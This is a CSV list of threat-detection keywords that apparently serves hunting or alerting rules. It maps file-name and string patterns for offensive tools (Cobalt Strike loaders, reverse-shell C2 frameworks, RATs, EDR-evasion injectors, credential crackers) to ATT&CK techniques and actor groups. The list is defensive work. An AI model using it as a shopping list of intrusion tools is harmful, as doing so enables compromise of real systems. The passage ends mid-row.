TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*python3*.exe .\nxc*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*python3??/generator.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*python3??/PyLoader.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*python3_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*python3_reverse_tcp_v2.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*pywerview.py*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*pywhisker.py -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pywhisker.py*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,1,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*pywhisker-main*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,1,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*pywsus.py*,offensive_tool_keyword,pywsus,The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.,T1505.003 - T1001.001 - T1560.001 - T1071.001,TA0003 - TA0011 - TA0002,N/A,N/A,Network Exploitation tools,https://github.com/GoSecure/pywsus,1,1,N/A,N/A,3,248,38,2022-11-11T19:59:21Z,2020-08-11T21:44:35Z -*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*qtc-de/remote-method-guesser*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*QUAPCInjectAsSystem*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*QUAPCInjectElevated*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*QUAPCInjectFakecmd*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*QUAPCInjectFakecmd*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*QUAPCInjectWithoutPid*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*Quasar.Client.*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Quasar.exe*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Quasar.Server*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Quasar.sln*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*quasar/Quasar*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Quasar-master.zip*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*QuasarRAT*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*quentinhardy*msdat*,offensive_tool_keyword,MSDAT,MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.,T1110 - T1059 - T1210 - T1047,TA0002 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/quentinhardy/msdat,1,1,N/A,N/A,8,764,144,2023-08-01T10:54:24Z,2018-02-15T12:34:57Z -*quser.x64.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*quser.x86.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*qwinsta /server:*,greyware_tool_keyword,qwinsta,enumerate rdp session on a remote server,T1049 - T1018 - T1021.001,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,N/A,1,0,N/A,3,8,N/A,N/A,N/A,N/A -*qwqdanchun*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*qwqdanchun/DcRat*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*,offensive_tool_keyword,mimikatz,invoke mimiaktz string found used by the tool EDRaser ,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*QXh4OEF4eDhBeHg4QXh4OA==*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,1,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*r00t-3xp10it*,offensive_tool_keyword,Github Username,Pentest hosting multiple offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/r00t-3xp10it,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*r0oth3x49/Tor.git*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*r1cksec/thoth*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*r2pm -i dirtycow*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,0,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z -*r4wd3r/Suborner*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,1,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*Radare2*,offensive_tool_keyword,Radare2,r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. attaching to remote gdb servers,T1057 - T1064 - T1059 - T1202,TA0002 - TA0008 - TA0001,N/A,N/A,Information Gathering,https://github.com/radareorg/radare2,1,0,N/A,N/A,10,18644,2911,2023-10-03T21:41:38Z,2012-07-03T07:42:26Z -*radius2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*radius2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*RAI/ase_docker*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*rai-attack-servers.*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 